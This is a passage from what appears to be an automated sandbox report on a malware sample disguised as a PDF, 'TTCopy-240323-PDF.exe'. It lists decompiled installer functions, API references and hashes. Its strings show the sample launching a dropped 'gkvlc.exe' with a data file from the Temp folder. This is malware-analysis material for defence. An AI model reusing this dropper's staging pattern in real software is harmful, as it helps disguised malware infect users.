                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                            Strings
                                                                                            • "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi, xrefs: 00404960
                                                                                            • N, xrefs: 0040491F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$N
                                                                                            • API String ID: 3103080414-2625693591
                                                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                            0x004062ae
                                                                                            0x004062b7
                                                                                            0x004062be
                                                                                            0x004062c8
                                                                                            0x004062dc
                                                                                            0x00406304
                                                                                            0x0040630b
                                                                                            0x0040630f
                                                                                            0x00406313
                                                                                            0x00406333
                                                                                            0x0040633a
                                                                                            0x00406344
                                                                                            0x00406351
                                                                                            0x00406356
                                                                                            0x0040635b
                                                                                            0x0040635f
                                                                                            0x0040636e
                                                                                            0x00406370
                                                                                            0x0040637d
                                                                                            0x00406381
                                                                                            0x0040641c
                                                                                            0x00000000
                                                                                            0x00406397
                                                                                            0x004063a4
                                                                                            0x004063c8
                                                                                            0x004063cc
                                                                                            0x004063eb
                                                                                            0x004063ef
                                                                                            0x004063ef
                                                                                            0x004063f1
                                                                                            0x004063fa
                                                                                            0x00406405
                                                                                            0x00406410
                                                                                            0x00406416
                                                                                            0x00000000
                                                                                            0x00406416
                                                                                            0x004063ce
                                                                                            0x004063d1
                                                                                            0x004063dc
                                                                                            0x004063d8
                                                                                            0x004063da
                                                                                            0x004063db
                                                                                            0x004063db
                                                                                            0x004063e3
                                                                                            0x004063e5
                                                                                            0x00000000
                                                                                            0x004063e5
                                                                                            0x004063af
                                                                                            0x004063b5
                                                                                            0x00000000
                                                                                            0x004063b5
                                                                                            0x00406381
                                                                                            0x0040635f
                                                                                            0x004062de
                                                                                            0x004062e9
                                                                                            0x004062f2
                                                                                            0x004062f6
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004062f6
                                                                                            0x00406427

                                                                                            APIs
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                            • wsprintfA.USER32 ref: 0040632D
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                            • GlobalFree.KERNEL32 ref: 00406416
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\TTCopy-240323-PDF.exe,80000000,00000003), ref: 0040615C
                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                            • API String ID: 2171350718-2295842750
                                                                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 90%
                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                            0x0040100a
                                                                                            0x00401039
                                                                                            0x00401047
                                                                                            0x0040104d
                                                                                            0x00401051
                                                                                            0x0040105b
                                                                                            0x00401061
                                                                                            0x00401064
                                                                                            0x004010f3
                                                                                            0x00401089
                                                                                            0x0040108c
                                                                                            0x004010a6
                                                                                            0x004010bd
                                                                                            0x004010cc
                                                                                            0x004010cf
                                                                                            0x004010d5
                                                                                            0x004010d9
                                                                                            0x004010e4
                                                                                            0x004010ed
                                                                                            0x004010ef
                                                                                            0x004010ef
                                                                                            0x00401100
                                                                                            0x00401105
                                                                                            0x0040110d
                                                                                            0x00401110
                                                                                            0x00401112
                                                                                            0x00401118
                                                                                            0x0040111f
                                                                                            0x00401126
                                                                                            0x00401130
                                                                                            0x00401142
                                                                                            0x00401156
                                                                                            0x00401160
                                                                                            0x00401165
                                                                                            0x00401165
                                                                                            0x00401110
                                                                                            0x0040116e
                                                                                            0x00000000
                                                                                            0x00401178
                                                                                            0x00401010
                                                                                            0x00401013
                                                                                            0x00401015
                                                                                            0x0040101f
                                                                                            0x0040101f
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F
                                                                                            • API String ID: 941294808-1304234792
                                                                                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 72%
                                                                                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                            0x004066a5
                                                                                            0x004066a5
                                                                                            0x004066a5
                                                                                            0x004066ab
                                                                                            0x004066b0
                                                                                            0x004066c1
                                                                                            0x004066c1
                                                                                            0x004066c9
                                                                                            0x004066ca
                                                                                            0x004066cb
                                                                                            0x004066cc
                                                                                            0x004066cf
                                                                                            0x004066d7
                                                                                            0x004066d9
                                                                                            0x004066ea
                                                                                            0x004066ed
                                                                                            0x004066ed
                                                                                            0x004066f1
                                                                                            0x004066f7
                                                                                            0x004066fa
                                                                                            0x004068d5
                                                                                            0x004068d5
                                                                                            0x004068e0
                                                                                            0x004068ec
                                                                                            0x004068ec
                                                                                            0x00000000
                                                                                            0x00406700
                                                                                            0x00406705
                                                                                            0x0040671a
                                                                                            0x0040671b
                                                                                            0x00406721
                                                                                            0x004068b3
                                                                                            0x004068c1
                                                                                            0x004068c4
                                                                                            0x004068c4
                                                                                            0x004068b5
                                                                                            0x004068b8
                                                                                            0x004068bb
                                                                                            0x004068bd
                                                                                            0x004068bd
                                                                                            0x004068c6
                                                                                            0x004068c6
                                                                                            0x004068cc
                                                                                            0x004068cf
                                                                                            0x00406702
                                                                                            0x00000000
                                                                                            0x00406702
                                                                                            0x00000000
                                                                                            0x004068cf
                                                                                            0x00406727
                                                                                            0x0040672a
                                                                                            0x00406739
                                                                                            0x00406740
                                                                                            0x0040674c
                                                                                            0x0040674f
                                                                                            0x00406752
                                                                                            0x00406753
                                                                                            0x00406758
                                                                                            0x0040675e
                                                                                            0x00406761
                                                                                            0x00406764
                                                                                            0x00406857
                                                                                            0x0040685c
                                                                                            0x0040688f
                                                                                            0x00406894
                                                                                            0x00406899
                                                                                            0x0040689e
                                                                                            0x0040689e
                                                                                            0x004068a3
                                                                                            0x004068a9
                                                                                            0x004068ac
                                                                                            0x00000000
                                                                                            0x004068ac
                                                                                            0x0040685e
                                                                                            0x00406861
                                                                                            0x00406864
                                                                                            0x00406879
                                                                                            0x00406880
                                                                                            0x00406866
                                                                                            0x0040686d
                                                                                            0x0040686d
                                                                                            0x00406888
                                                                                            0x0040688b
                                                                                            0x0040684f
                                                                                            0x00406850
                                                                                            0x00406850
                                                                                            0x00000000
                                                                                            0x0040688b
                                                                                            0x00406771
                                                                                            0x00406775
                                                                                            0x00406775
                                                                                            0x00406776
                                                                                            0x00406778
                                                                                            0x004067b5
                                                                                            0x004067b8
                                                                                            0x004067c8
                                                                                            0x004067cb
                                                                                            0x004067d3
                                                                                            0x004067d9
                                                                                            0x004067d9
                                                                                            0x00406834
                                                                                            0x00406834
                                                                                            0x00406836
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067dd
                                                                                            0x004067e2
                                                                                            0x004067e3
                                                                                            0x004067e5
                                                                                            0x004067fc
                                                                                            0x0040680a
                                                                                            0x00406810
                                                                                            0x00406812
                                                                                            0x00406830
                                                                                            0x00406830
                                                                                            0x00406830
                                                                                            0x00000000
                                                                                            0x00406830
                                                                                            0x00406818
                                                                                            0x00406821
                                                                                            0x00406824
                                                                                            0x0040682a
                                                                                            0x0040682e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040682e
                                                                                            0x004067f6
                                                                                            0x004067f8
                                                                                            0x004067fa
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004067fa
                                                                                            0x00000000
                                                                                            0x00406834
                                                                                            0x004067c0
                                                                                            0x00000000
                                                                                            0x0040677a
                                                                                            0x00406798
                                                                                            0x004067a1
                                                                                            0x0040683e
                                                                                            0x00406842
                                                                                            0x0040684a
                                                                                            0x0040684a
                                                                                            0x00000000
                                                                                            0x00406842
                                                                                            0x004067ab
                                                                                            0x00406838
                                                                                            0x0040683c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040683c
                                                                                            0x00406778
                                                                                            0x00000000
                                                                                            0x00406705

                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000400), ref: 004067C0
                                                                                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                                                            • lstrcatW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                            • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\gkvlc.exe" C:\Users\user\AppData\Local\Temp\htujbhttw.eyi$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                            • API String ID: 4260037668-3986121413
                                                                                            • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                            • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                                                            • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                                                            • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004056CA(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x429244;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x42a314;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
					}
					_t27 = lstrlenW(0x422728);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x429228, 0x422728);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x422728;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x422728[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x422728, _a8);
							goto L6;
						}
					}
				}
